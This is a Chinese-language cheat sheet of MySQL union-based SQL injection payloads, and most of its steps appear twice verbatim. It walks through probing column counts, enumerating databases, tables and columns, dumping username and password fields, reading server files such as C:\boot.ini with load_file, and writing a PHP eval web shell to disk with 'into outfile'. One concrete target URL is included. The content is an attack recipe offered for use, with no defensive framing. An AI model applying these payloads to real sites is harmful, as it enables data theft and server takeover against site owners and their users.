1 判断:and 1=1 and 1=2
2 爆字段数 order by x
3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
4 查用户版本裤名:user(),version(),database() 如:爆出2,5,6
and 1=2 union select 1,user(),3,4,version(),database(),7,8,9,10,11,12,13,14,15,16
或: and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
判断有几个库:
and 1=2+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5
english/newsview.php?id=746and1=2unionselect0,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),0,0,0,0,0,0,0,0from(select*frominformation_schema.tablesgroupbytable_schemaorderbytable_schema)tlimit1/*and1=1
逐条爆库:
english/newsview.php?id=746and1=2unionselect0,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),0,0,0,0,0,0,0,0from(select*from(select*frominformation_schema.tablesgroupbytable_schemaorderbytable_schemalimit0,1)torderbytable_schemadesc)tlimit1/*and1=1
5 爆所有数据裤: group_concat只能在5。0以上版本用
and 1=2 union select 1,group_concat(schema_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.schemata--
6 爆所有表名:
and 1=2 union select 1,group_concat(table_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
7 爆所有列名:
and 1=2 union select 1,group_concat(column_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.columns where table_name=0x636F-- 表名的16进制
8 5.0以下爆裤表及列用法:
爆数据裤:
and 1=2 union select 1,schema_name,3,4,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1/*
爆表名:
and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA=0x686273746172735F636D73 limit 0,1/* 0x63636d74裤名的16进制
爆列名:
and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=0x61666669636865 limit 0,1/* 这里 0x61666669636865 是0x+表名的十六进制
暴库 (mysql>5.0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)--
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
and 1=2 Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
9 读C:\boot.ini文件 当然也可以读目录 /c:\/
譬如你读出来的内容如果含有<>等符号,那么浏览器就会执行你的文件内容,你自然什么都看不到.对付这样的情况
replace(load_file(A)),char(B),char(C))
and 1=2 union select 1,2,3,4,replace(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),char(60),char(32)),6,7,8,9,10,11,12,13,14--
或:and 1=2 union select 1,2,3,4,replace(load_file(0x433A5C626F6F742E696E69),char(60),char(32)),6,7,8,9,10,11,12,13,14--
2: 所有的字段位置都不够位置回显,读到的文件不完整,Substring(str,pos,len)函数解决问题.他的意思是从字符串str的pos位位置起返回len个字符的子串.
譬如Substring(load_file(A),50,100)就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.
and 1=2 union select 1,2,3,4,Substring(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),50,100),6,7,8,9,10,11,12,13,14--
10 直接写马(Root权限)
条件:1、知道站点物理路径
2、有足够大的权限(and (select count(*) from mysql.user)>0)
3、magic_quotes_gpc()=OFF
select ‘<?php eval_r($_POST[cmd])?>' into outfile ‘物理路径'
and 1=2 union all select 一句话HEX值 into outfile '路径'
2 爆字段数 order by x
3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
4 查用户版本裤名:user(),version(),database() 如:爆出2,5,6
and 1=2 union select 1,user(),3,4,version(),database(),7,8,9,10,11,12,13,14,15,16
或: and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
判断有几个库:
and 1=2+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5
english/newsview.php?id=746and1=2unionselect0,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),0,0,0,0,0,0,0,0from(select*frominformation_schema.tablesgroupbytable_schemaorderbytable_schema)tlimit1/*and1=1
逐条爆库:
english/newsview.php?id=746and1=2unionselect0,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),0,0,0,0,0,0,0,0from(select*from(select*frominformation_schema.tablesgroupbytable_schemaorderbytable_schemalimit0,1)torderbytable_schemadesc)tlimit1/*and1=1
5 爆所有数据裤: group_concat只能在5。0以上版本用
and 1=2 union select 1,group_concat(schema_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.schemata--
6 爆所有表名:
and 1=2 union select 1,group_concat(table_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
7 爆所有列名:
and 1=2 union select 1,group_concat(column_name) ,3,user(),load_file(char(99,58,92,98,111,111,116,46,105,110,105)),6,7,8,9,10,11 from information_schema.columns where table_name=0x636F-- 表名的16进制
8 5.0以下爆裤表及列用法:
爆数据裤:
and 1=2 union select 1,schema_name,3,4,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1/*
爆表名:
and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA=0x686273746172735F636D73 limit 0,1/* 0x63636d74裤名的16进制
爆列名:
and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=0x61666669636865 limit 0,1/* 这里 0x61666669636865 是0x+表名的十六进制
暴库 (mysql>5.0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)--
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
and 1=2 Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
9 读C:\boot.ini文件 当然也可以读目录 /c:\/
譬如你读出来的内容如果含有<>等符号,那么浏览器就会执行你的文件内容,你自然什么都看不到.对付这样的情况
replace(load_file(A)),char(B),char(C))
and 1=2 union select 1,2,3,4,replace(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),char(60),char(32)),6,7,8,9,10,11,12,13,14--
或:and 1=2 union select 1,2,3,4,replace(load_file(0x433A5C626F6F742E696E69),char(60),char(32)),6,7,8,9,10,11,12,13,14--
2: 所有的字段位置都不够位置回显,读到的文件不完整,Substring(str,pos,len)函数解决问题.他的意思是从字符串str的pos位位置起返回len个字符的子串.
譬如Substring(load_file(A),50,100)就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.
and 1=2 union select 1,2,3,4,Substring(load_file(char(99,58,92,98,111,111,116,46,105,110,105)),50,100),6,7,8,9,10,11,12,13,14--
10 直接写马(Root权限)
条件:1、知道站点物理路径
2、有足够大的权限(and (select count(*) from mysql.user)>0)
3、magic_quotes_gpc()=OFF
select ‘<?php eval_r($_POST[cmd])?>' into outfile ‘物理路径'
and 1=2 union all select 一句话HEX值 into outfile '路径'